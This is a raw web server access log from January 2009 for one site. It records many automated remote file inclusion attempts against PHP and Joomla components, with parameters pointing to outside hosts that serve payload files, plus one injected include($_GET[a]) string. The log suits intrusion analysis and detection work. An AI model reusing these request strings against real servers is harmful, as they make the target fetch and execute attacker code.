66.152.162.116 - - [30/Jan/2009:09:28:34 -0800] "GET /logs/access_080528.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.34.133.35 - - [30/Jan/2009:09:28:35 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.karnatakajesuits.net/apps/ccmail/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.34.133.35 - - [30/Jan/2009:09:28:35 -0800] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.karnatakajesuits.net/apps/ccmail/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.34.133.35 - - [30/Jan/2009:09:28:35 -0800] "GET /logs/access_081119.log//include/print_category.php?setup[use_category]=1&dir=http://www.karnatakajesuits.net/apps/ccmail/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:09:28:35 -0800] "GET /logs/access_080503.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:09:28:48 -0800] "GET /logs/access_080817.log%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://eskipazartarim.gov.tr/uploads/main.js??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:09:29:00 -0800] "GET /logs/access_080510.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:09:29:01 -0800] "GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 200 95183 "-" "libwww-perl/5.813" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:09:29:01 -0800] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:09:29:01 -0800] "GET /logs/access_080620.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:09:29:07 -0800] "GET /logs/access_080528.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:09:29:12 -0800] "GET /logs/access_080824.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:09:29:13 -0800] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 200 95134 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:09:29:14 -0800] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:09:29:26 -0800] "GET /logs/access_080503.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:09:30:15 -0800] "GET /logs/access_080510.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:09:30:16 -0800] "GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 200 95183 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:09:30:17 -0800] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:09:30:18 -0800] "GET /logs/access_080620.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.31.16.164 - - [30/Jan/2009:09:30:32 -0800] "GET /logs/access.log//galeria.php?start=0&kategoria=http://djclan.com/herndl/cms/contenido/logs/Tuxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
82.146.44.64 - - [30/Jan/2009:09:30:58 -0800] "GET /index2.php?x=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.146.44.64 - - [30/Jan/2009:09:30:59 -0800] "GET /logs/index2.php?x=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.146.44.64 - - [30/Jan/2009:09:30:59 -0800] "GET /logs/access_080526.log/index2.php?x=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.31.16.164 - - [30/Jan/2009:09:31:00 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.inec.ie//assets/images/Albid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.236.53.4 - - [30/Jan/2009:09:31:16 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://euromovers.de/tmp/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [30/Jan/2009:09:31:16 -0800] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://euromovers.de/tmp/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [30/Jan/2009:09:31:16 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://euromovers.de/tmp/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [30/Jan/2009:09:31:21 -0800] "GET /logs/access_080111.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://euromovers.de/tmp/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.67.25.19 - - [30/Jan/2009:09:31:28 -0800] "GET /logs/access_080618.log//?path_escape=http://alwaysdollar.com/portal/frameset/html/inc/elang/db.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
80.67.25.19 - - [30/Jan/2009:09:31:29 -0800] "GET /?path_escape=http://alwaysdollar.com/portal/frameset/html/inc/elang/db.txt?? HTTP/1.1" 200 94945 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
147.213.65.178 - - [30/Jan/2009:09:31:30 -0800] "GET /logs/access_080401.log/index.php?load=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.67.25.19 - - [30/Jan/2009:09:31:30 -0800] "GET /logs/access_080701.log//?path_escape=http://alwaysdollar.com/portal/frameset/html/inc/elang/db.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
147.213.65.178 - - [30/Jan/2009:09:31:32 -0800] "GET /index.php?load=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt?? HTTP/1.1" 200 94885 "-" "libwww-perl/5.803" "www.dmulk.com"
147.213.65.178 - - [30/Jan/2009:09:31:33 -0800] "GET /logs/index.php?load=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.12 - - [30/Jan/2009:09:31:44 -0800] "GET /logs/access_080413.log//auth.cookie.inc.php?da_path=http://armadaglass.webrok.co.uk/p6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.12 - - [30/Jan/2009:09:31:44 -0800] "GET /auth.cookie.inc.php?da_path=http://armadaglass.webrok.co.uk/p6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.12 - - [30/Jan/2009:09:31:45 -0800] "GET /logs//auth.cookie.inc.php?da_path=http://armadaglass.webrok.co.uk/p6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:09:31:56 -0800] "GET /logs/access_080831.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:09:31:56 -0800] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 200 95188 "-" "libwww-perl/5.813" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:09:31:57 -0800] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:09:32:00 -0800] "GET /logs/access_080503.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:09:32:01 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 200 95160 "-" "libwww-perl/5.813" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:09:32:01 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:09:32:07 -0800] "GET /logs/access_080123.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:09:32:08 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 200 95183 "-" "libwww-perl/5.813" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:09:32:08 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:09:32:11 -0800] "GET /logs/access_080831.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.236.53.4 - - [30/Jan/2009:09:32:12 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://euromovers.de/tmp/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [30/Jan/2009:09:32:12 -0800] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://euromovers.de/tmp/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [30/Jan/2009:09:32:12 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://euromovers.de/tmp/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:09:32:12 -0800] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 200 95204 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:09:32:14 -0800] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:09:32:18 -0800] "GET /logs/access_081021.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:09:32:19 -0800] "GET /logs/access_080503.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.25.19 - - [30/Jan/2009:09:32:19 -0800] "GET /?path_escape=http://alwaysdollar.com/portal/frameset/html/inc/elang/db.txt?? HTTP/1.1" 200 94929 "-" "libwww-perl/5.808" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:09:32:23 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 200 95176 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:09:32:24 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.236.53.4 - - [30/Jan/2009:09:32:27 -0800] "GET /logs/access_081107.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://euromovers.de/tmp/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.135.71.20 - - [30/Jan/2009:09:32:29 -0800] "GET /logs/access_081227.log/tools/send_reminders.php?noSet=0&includedir=http://www.mariagemixte.com/rencontre/safe1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [30/Jan/2009:09:32:29 -0800] "GET /logs/access_081227.log/tools/send_reminders.php?noSet=0&includedir=http://www.mariagemixte.com/rencontre/safe1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [30/Jan/2009:09:32:29 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.mariagemixte.com/rencontre/safe1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [30/Jan/2009:09:32:29 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.mariagemixte.com/rencontre/safe1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [30/Jan/2009:09:32:29 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.mariagemixte.com/rencontre/safe1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [30/Jan/2009:09:32:29 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.mariagemixte.com/rencontre/safe1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:09:32:32 -0800] "GET /logs/access_080123.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:09:32:33 -0800] "GET /logs/access_080813.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:09:32:33 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 200 95183 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:09:32:34 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:09:32:43 -0800] "GET /logs/access_080521.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
80.67.25.19 - - [30/Jan/2009:09:32:46 -0800] "GET /logs/access_080918.log//?path_escape=http://alwaysdollar.com/portal/frameset/html/inc/elang/db.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.25.19 - - [30/Jan/2009:09:32:47 -0800] "GET /?path_escape=http://alwaysdollar.com/portal/frameset/html/inc/elang/db.txt?? HTTP/1.1" 200 94945 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.25.19 - - [30/Jan/2009:09:32:49 -0800] "GET /logs//?path_escape=http://alwaysdollar.com/portal/frameset/html/inc/elang/db.txt?? HTTP/1.1" 200 84609 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.25.19 - - [30/Jan/2009:09:32:50 -0800] "GET /logs/access_080217.log//?path_escape=http://alwaysdollar.com/portal/frameset/html/inc/elang/db.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:09:33:10 -0800] "GET /logs/access_080813.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:09:33:11 -0800] "GET /logs/access_081021.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:09:33:18 -0800] "GET /logs/access_080915.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:09:33:18 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:09:33:34 -0800] "GET /logs/access_080521.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.172.33.230 - - [30/Jan/2009:09:33:55 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.karnatakajesuits.net/apps/ccmail/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.172.33.230 - - [30/Jan/2009:09:33:55 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.karnatakajesuits.net/apps/ccmail/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.172.33.230 - - [30/Jan/2009:09:33:55 -0800] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.karnatakajesuits.net/apps/ccmail/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
222.236.47.182 - - [30/Jan/2009:09:33:57 -0800] "GET /logs//errors.php?error=http://www.geocities.com/amosmarkp3/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [30/Jan/2009:09:33:57 -0800] "GET /errors.php?error=http://www.geocities.com/amosmarkp3/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [30/Jan/2009:09:33:58 -0800] "GET /logs/access_081012.log//errors.php?error=http://www.geocities.com/amosmarkp3/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
147.213.65.178 - - [30/Jan/2009:09:34:12 -0800] "GET /logs/access_080912.log/index.php?load=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:09:34:23 -0800] "GET /logs/access_080823.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.172.33.230 - - [30/Jan/2009:09:34:29 -0800] "GET /logs/access_081107.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.karnatakajesuits.net/apps/ccmail/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.251.42 - - [30/Jan/2009:09:34:36 -0800] "GET /logs/access_080817.log%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.karnatakajesuits.net/apps/ccmail/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.251.42 - - [30/Jan/2009:09:34:36 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.karnatakajesuits.net/apps/ccmail/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.251.42 - - [30/Jan/2009:09:34:36 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.karnatakajesuits.net/apps/ccmail/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
113.30.66.5 - - [30/Jan/2009:09:34:53 -0800] "GET /logs//phpSecurePages/secure.php?&cfgProgDir=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
113.30.66.5 - - [30/Jan/2009:09:34:53 -0800] "GET /phpSecurePages/secure.php?&cfgProgDir=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
113.30.66.5 - - [30/Jan/2009:09:34:54 -0800] "GET /logs/access_080904.log//phpSecurePages/secure.php?&cfgProgDir=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
113.30.66.5 - - [30/Jan/2009:09:34:55 -0800] "GET /logs/access_080702.log//phpSecurePages/secure.php?&cfgProgDir=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [30/Jan/2009:09:34:55 -0800] "GET /errors.php?error=http://www.geocities.com/amosmarkp3/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [30/Jan/2009:09:34:55 -0800] "GET /logs/access_081027.log//errors.php?error=http://www.geocities.com/amosmarkp3/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [30/Jan/2009:09:34:55 -0800] "GET /logs//errors.php?error=http://www.geocities.com/amosmarkp3/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [30/Jan/2009:09:35:01 -0800] "GET /logs//errors.php?error=http://www.geocities.com/amosmarkp3/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [30/Jan/2009:09:35:01 -0800] "GET /errors.php?error=http://www.geocities.com/amosmarkp3/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [30/Jan/2009:09:35:01 -0800] "GET /logs/access_081012.log//errors.php?error=http://www.geocities.com/amosmarkp3/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.146.44.64 - - [30/Jan/2009:09:35:21 -0800] "GET /logs/access_080317.log/index2.php?x=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [30/Jan/2009:09:35:35 -0800] "GET /logs/access_081107.log//errors.php?error=http://www.geocities.com/amosmarkp3/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.174.137 - - [30/Jan/2009:09:35:51 -0800] "GET /logs/access_080322.log%20//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://acerbix.altervista.org/iddd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.236.47.182 - - [30/Jan/2009:09:36:01 -0800] "GET /logs/access_081008.log//errors.php?error=http://www.geocities.com/amosmarkp3/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.251.42 - - [30/Jan/2009:09:36:16 -0800] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.karnatakajesuits.net/apps/ccmail/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
113.30.66.5 - - [30/Jan/2009:09:36:41 -0800] "GET /logs/access_080702.log%20%20//phpSecurePages/secure.php?&cfgProgDir=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
113.30.66.5 - - [30/Jan/2009:09:36:41 -0800] "GET /logs/access_080904.log%20%20//phpSecurePages/secure.php?&cfgProgDir=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.31.16.164 - - [30/Jan/2009:09:36:57 -0800] "GET /logs//galeria.php?start=0&kategoria=http://www.inec.ie//assets/images/Albid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.31.16.164 - - [30/Jan/2009:09:36:57 -0800] "GET /galeria.php?start=0&kategoria=http://www.inec.ie//assets/images/Albid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.251.42 - - [30/Jan/2009:09:37:02 -0800] "GET /logs/access_081107.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.karnatakajesuits.net/apps/ccmail/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.30.65.25 - - [30/Jan/2009:09:37:03 -0800] "GET /logs/access_070805.log HTTP/1.0" 200 30484 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.31.16.164 - - [30/Jan/2009:09:37:31 -0800] "GET /logs//galeria.php?start=0&kategoria=http://www.inec.ie//assets/images/Albid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.31.16.164 - - [30/Jan/2009:09:37:32 -0800] "GET /galeria.php?start=0&kategoria=http://www.inec.ie//assets/images/Albid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
147.213.65.178 - - [30/Jan/2009:09:37:38 -0800] "GET /index.php?load=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt?? HTTP/1.1" 200 94901 "-" "libwww-perl/5.803" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:09:38:25 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
